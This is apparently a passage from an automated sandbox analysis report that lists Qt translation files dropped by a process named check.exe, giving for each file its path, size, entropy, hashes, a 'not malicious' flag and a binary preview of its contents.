SHA1:	589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
SHA-256:	7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
SHA-512:	D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10284
Entropy (8bit):	4.674501432335502
Encrypted:	false
SSDEEP:	192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
MD5:	5A56E9E2ED6ECE3F249D1C2A7EB3B172
SHA1:	D6F079F40FBB813B0293C1D2210BAE7084092FEC
SHA-256:	70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
SHA-512:	28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10612
Entropy (8bit):	4.458970627057882
Encrypted:	false
SSDEEP:	192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
MD5:	3639B57B463987F6DB07629253ACD8BF
SHA1:	65935A67C73F19FCF6023FB95030A5ACAF9DA21C
SHA-256:	316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
SHA-512:	AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7917
Entropy (8bit):	5.680408580146589
Encrypted:	false
SSDEEP:	192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
MD5:	1380A9352C476071BDA5A5D4FED0B6C5
SHA1:	9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
SHA-256:	AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
SHA-512:	EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....\|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	5708
Entropy (8bit):	5.698914195742074
Encrypted:	false
SSDEEP:	96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
MD5:	CD15674A652C2BF435F7578E119182F8
SHA1:	AEA22E4A0D21396733802C7AB738DDD03737B7D6
SHA-256:	F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
SHA-512:	88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....\|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...\|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...\|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...\|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9673
Entropy (8bit):	4.622652249027856
Encrypted:	false
SSDEEP:	192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
MD5:	2B68446B69D9AA40B273D75A581D2992
SHA1:	8A09BD38998543B74E2673478EDD54FB4BBDD068
SHA-256:	CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
SHA-512:	F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.\|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7288
Entropy (8bit):	5.297177914619657
Encrypted:	false
SSDEEP:	192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
MD5:	794AF445A5D7082D51BD22683449F86D
SHA1:	3A0C369872B112A1572AA17EEB814B168B225D98
SHA-256:	557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
SHA-512:	D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	4.70568613551943
Encrypted:	false
SSDEEP:	192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
MD5:	75C94E59F1FC5312AE25381C247AF992
SHA1:	E3E5F4582CC5FAFE6DF43644D11484861023C084
SHA-256:	F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
SHA-512:	959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_sl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10363
Entropy (8bit):	4.613473842638716
Encrypted:	false
SSDEEP:	192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
MD5:	3B0AEE27B193A8A563C5CB5C7C4FE60F
SHA1:	C94E832595EC765370553468F87C02DB7E7D138A
SHA-256:	2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
SHA-512:	EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.68793836539357
Encrypted:	false
SSDEEP:	96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
MD5:	32D6EE3D8EE6408A03E568B972F93BCB
SHA1:	582EE079DBD42000C378E0701D26405750524DBA
SHA-256:	EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
SHA-512:	24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9750
Entropy (8bit):	5.281035122342072
Encrypted:	false
SSDEEP:	192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
MD5:	90A776917D534B65942063C319573CDC
SHA1:	5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
SHA-256:	497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
SHA-512:	B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_zh_CN.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	6441
Entropy (8bit):	5.790303416386852
Encrypted:	false
SSDEEP:	192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
MD5:	9297A6905B8B1823BF7E318D9138A104
SHA1:	3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
SHA-256:	C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
SHA-512:	01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_help_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.80411750798786
Encrypted:	false
SSDEEP:	192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
MD5:	47C3328D3918CF627112BB6C50E30B86
SHA1:	05705603AB3F28402A6C103E1C41DDFF21D140C0
SHA-256:	3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
SHA-512:	8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.6255640074603277
Encrypted:	false
SSDEEP:	3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
MD5:	5A46979B45C67DD6312F33CCEA2ED7BC
SHA1:	4C56836B1FB10D9903B299CBCB925947D515B4C8
SHA-256:	BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
SHA-512:	BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.5752972123113778
Encrypted:	false
SSDEEP:	3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
MD5:	2BB8C94D420D3BC344C79A01043BDC89
SHA1:	3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
SHA-256:	9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
SHA-512:	C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.599979504080125
Encrypted:	false
SSDEEP:	3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
MD5:	8A1EE3433304838CCD0EBE0A825E84D8
SHA1:	2B3476588350C5384E0F9A51FF2E3659E89B4846
SHA-256:	23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
SHA-512:	2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.652277257665055
Encrypted:	false
SSDEEP:	3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
MD5:	7B2659AF52B824EAC6C169CDD9467EE9
SHA1:	5727109218B222E3B654A8CC9933E970EB7C2118
SHA-256:	4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
SHA-512:	E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o

C:\Users\user\AppData\Local\Temp\_MEI60842\PyQt5\Qt5\translations\qt_lt.qm

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	165383
Entropy (8bit):	4.805977227348512
Encrypted:	false
SSDEEP:	1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
MD5:	8992B652D1499F5D2F12674F3F875A35
SHA1:	E22766A49612F79156C550D83C6C230345DDA433
SHA-256:	47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
SHA-512:	9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
Malicious:	false
Reputation:	unknown
